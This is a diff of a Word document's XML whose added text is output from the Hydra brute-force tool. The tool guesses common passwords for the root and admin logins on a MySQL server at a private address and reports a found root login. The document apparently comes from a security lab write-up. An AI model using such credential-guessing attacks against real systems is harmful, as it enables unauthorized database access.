+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>hydra.restore</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[DATA] max 4 tasks per 1 server, overall 4 tasks, 35 login tri</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>es (l:5/p:7), ~9 tries per task</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[DATA] attac</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>king mysql://172.43.0.154:3306/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[ATTEMPT] target 172.43.0.154 - login "root" - pass "password"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - 1 of 35 [child 0] (0/0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[ATTEMPT] target 172.43.0.154 - login "root" - pa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ss "" - 2 of 35 [child 1] (0/0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[ATTEMPT] target 172.43.0.154 - login "root" - pass "</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>root" - 3 of 35 [child 2] (0/0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[ATTEMPT] target 172.43.0.154 - login "root" - pass "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>toor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">" - 4 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>of 35 [child 3] (0/0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[ATTEMPT] target 172.43.0.154 - login "root" - pass "a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>dmin" - 5 of 35 [child 2] (0/0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[STATUS] 5.00 tries/min, 5 tries in 00:01</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>h, 30 to do in 00:07h, 4 active</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[ATTEMPT] target 172.43.0.154 - login "root" - pass "login" - 6 of 35 [chil</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>d 3] (0/0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>3306</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>][</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>mysql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] host: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>172.43.0.154</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   login: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>root</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[ATTEMPT] target 172.43.0.154 - login "admin" - pass "pass</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>word" - 8 of 35 [child 1] (0/0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[STATUS] 4.00 tries/min, 8 tries in 00:02h, 27 to do in 00:07h, 4 active</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="720"/>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
@@ -2003,6 +3138,103 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
+  <w:abstractNum w:abstractNumId="0">
+    <w:nsid w:val="0E2E374F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="729E73FE"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -2657,6 +3889,17 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:rsid w:val="00451CFF"/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="00975B7F"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -2926,7 +4169,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{474438A9-0C4E-49FE-97AD-EE3AD77FC52C}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E21DEE57-9852-4704-821F-F347B8FE9FBF}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
